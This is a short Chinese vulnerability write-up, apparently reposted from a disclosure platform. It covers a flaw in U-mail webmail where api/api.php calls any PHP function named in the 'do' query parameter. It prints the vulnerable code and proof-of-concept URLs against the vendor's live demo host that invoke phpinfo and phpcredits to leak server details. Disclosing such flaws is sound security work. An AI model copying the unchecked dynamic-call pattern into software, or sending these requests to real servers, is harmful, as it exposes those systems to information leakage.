网站地图    收藏   

主页 > 后端 > 网站安全 >

U-mail某鸡肋代码注入导致敏感信息泄漏(demo测试成

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 漏洞文件:api api php:670行$do = trim( $_GET[ 39;do 39;] );if ( function_exists( $do ) ){ $do( );}else{ echo param_error;}exit( );直接来个动态函数,可惜没有参数可控,...

漏洞文件:api/api.php:670行

 

$do = trim( $_GET['do'] );
if ( function_exists( $do ) )
{
    $do( );
}
else
{
    echo "param_error";
}
exit( );



直接来个动态函数,可惜没有参数可控,只能控制$do,所以可以鸡肋的用来读些敏感信息如phpinfo()/phpcredits()等

官网demo:

 

http://mail.comingchina.com/webmail/api/api.php?do=phpinfo


 

QQ20140729-1.png


 

http://mail.comingchina.com/webmail/api/api.php?do=phpcredits


 

QQ20140729-2.png


 

QQ20140729-3.png

 

修复方案:

过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论